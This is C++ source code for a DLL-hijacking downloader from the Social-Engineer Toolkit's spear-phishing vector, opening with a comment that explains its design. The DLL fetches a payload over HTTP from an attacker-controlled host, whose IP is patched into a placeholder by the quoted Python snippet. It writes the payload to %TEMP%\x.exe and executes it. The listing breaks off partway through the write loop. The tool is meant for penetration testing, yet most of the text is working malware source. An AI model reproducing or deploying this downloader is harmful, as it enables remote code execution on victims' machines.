/* DLL Hijacker Attack Written by Dave Kennedy (ReL1K) for the Social-Engineer Toolkit (SET) spear-phishing attack vector. [] SET DLL Version: 0.1 [] This DLL once executed will utilize a staged downloader that is read into memory then written to a file. It takes advantage of write permissions within the users %TEMP% directory. Had to do a unique method in doing dynamic DLL analysis in SET. If you notice the string char* host = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; SET will read in the binary and look for the static X's. Once it's found it will take the length of the IP address to replace and take into consideration length and replace the X's with the IP address. The only issue is if it is written to the buffer it would look something like: In order to get around this problem I added a null byte terminator at the end of the IP address. When the DLL executes, the string is forumated with the IP address a null byte terminator and the rest of the ascii X's. Once the null byte is hit it will stop execution and write out the appropriate format: Here's a snippet of the python code from SET: # replace ipaddress with one that we need for reverse connection back fileopen=open("src/dll_hijacking/hijacking.dll" , "rb") data=fileopen.read() filewrite=open("src/program_junk/dll/%s" % (dll), "wb") host=int(len(ipaddr)+1) * "X" filewrite.write(data.replace(str(host), ipaddr+"\x00", 1)) filewrite.close() Once the DLL is executed and the payload downloaded from the SET web server, a seperate thread is created and the payload executed. Once closed and the thread terminates, the executable should be deleted however this isn't 100 percent. Just a heads up if your using Dev-C++ to compile this you will need to go into Project -> Project Options -> Parameters -> Linkers and add: -lWininet */ #include #include #include #include #include int WINAPI GetData(HINTERNET hResource, LPBYTE& lpData, DWORD& pdwDataLength); int main() { // create a buffer for the temp directory path, technically if the path is longer then this there would be issues but this is a hack job :P char path[5000]; char* tmpdir = getenv("TMP"); if (!tmpdir) // grab the temp directory %TEMP% in Windows tmpdir = getenv("TEMP"); // print our temp directory to our buffer we created 'path' sprintf(path, "%s\\x.exe", tmpdir); // used to do dynamic DLL writing on the fly through SET, IP Address goes here with null byte terminator char* host = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; char* url = new char[2000]; // create a buffer for our replaced IP address sprintf(url,"http://%s/x", host); // should end up being http://ipaddressorhost/x LPCSTR userAgent = "The Social-Engineer Toolkit (SET)"; // SET doesn't care what your user-agent string is // start the internet connection and handle downloading the data HINTERNET hNet = InternetOpen(userAgent, PRE_CONFIG_INTERNET_ACCESS, NULL, INTERNET_INVALID_PORT_NUMBER, 0); HINTERNET hUrl = InternetOpenUrl(hNet, url, NULL, 0, INTERNET_FLAG_RELOAD, 0); LPBYTE lpData = NULL; DWORD dwLength = 0; GetData(hUrl, lpData, dwLength); InternetCloseHandle(hUrl); InternetCloseHandle(hNet); // Do something with the data in lpData here. // Size of data is in dwLength FILE *file; // write out a file to our temp directory, temp equals %TEMP%\x.exe file = fopen(path, "wb"); // write file x.vbs // for the length of the file write out the binary data from our buffer for (DWORD i=0; i